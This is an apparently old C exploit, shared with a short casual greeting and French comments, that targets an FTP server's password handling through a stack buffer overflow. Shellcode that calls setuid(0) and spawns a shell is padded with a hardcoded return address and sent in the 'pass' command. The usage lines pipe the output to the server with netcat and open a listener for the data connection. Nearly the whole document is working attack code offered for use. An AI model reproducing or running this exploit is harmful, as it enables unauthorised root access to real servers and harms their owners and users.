Elias sorry if you had this twice...
/*
** code-sky-chocolate: flaoua
** keyboard handler: kalou.
**
** usage: nc -l -p 1509 &
** (./p welcome.msg 195,3,2,83,5,229 -100 1016 ; cat ) | nc host 21
**
** tester avec buf == 1018, 1019, 1020, 1021
** a cause de l'alignement hostname+chemin ~ftp+taille fichier
** (voir xferlog)
*/
#include <stdio.h>
#include <string.h>
void add_reg(char *addr, char reg)
{
sprintf(addr + strlen(addr), "%c", reg);
if (reg == (char) 0xff)
sprintf(addr + strlen(addr), "%c", reg);
}
char *make_ret_addr(int ret)
{
unsigned char a1;
unsigned char a2;
unsigned char a3;
unsigned char a4;
char ret_addr[17];
a4 = (ret & 0xff000000) >> 24;
a3 = (ret & 0x00ff0000) >> 16;
a2 = (ret & 0x0000ff00) >> 8;
a1 = (ret & 0x000000ff);
strcpy(ret_addr, "");
add_reg(ret_addr, a1);
add_reg(ret_addr, a2);
add_reg(ret_addr, a3);
add_reg(ret_addr, a4);
return strdup(ret_addr);
}
char *make_buffer(int bytes, int ret_addr)
{
int count;
char code[] =
"\x52\x65\x6d\x6f\x76\x65\x20\x6d\x20" /* (to avoid a segfault) */
"\x90\x90\x90\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
int *ret;
int size;
static char *buf;
static char *addr;
addr = make_ret_addr(ret_addr);
size = bytes + 64 * (strlen(addr) - 4);
buf = (char *) malloc(size);
if (buf == (char *) NULL)
return (char *) NULL;
for (count = 0; count < size; count ++) {
*(buf + count) = 0xb8;
}
memcpy(buf + size - strlen(code) - 64 * strlen(addr), code, strlen(code));
for (count = 64; count > 0; count--) {
memcpy(buf + size - count * strlen(addr), addr, strlen(addr));
}
*(buf + size) = '\0';
return buf;
}
main(int argc, char **argv)
{
int bufsize = 1016;
int ret_addr = 0xbffff770;
if (argc > 3) {
ret_addr += atoi(argv[3]);
}
if (argc > 4) {
bufsize = atoi(argv[4]);
}
fprintf(stderr, "ret_addr %p - size %d.\n", ret_addr, bufsize);
printf("user ftp\n");
printf("pass %s\n", make_buffer(bufsize, ret_addr));
printf("nop\nnop\n");
printf("port %s\n", argv[2]?argv[2]:"127,0,0,1,5,228\n");
printf("retr %s\n", argv[1]?argv[1]:"README");
}
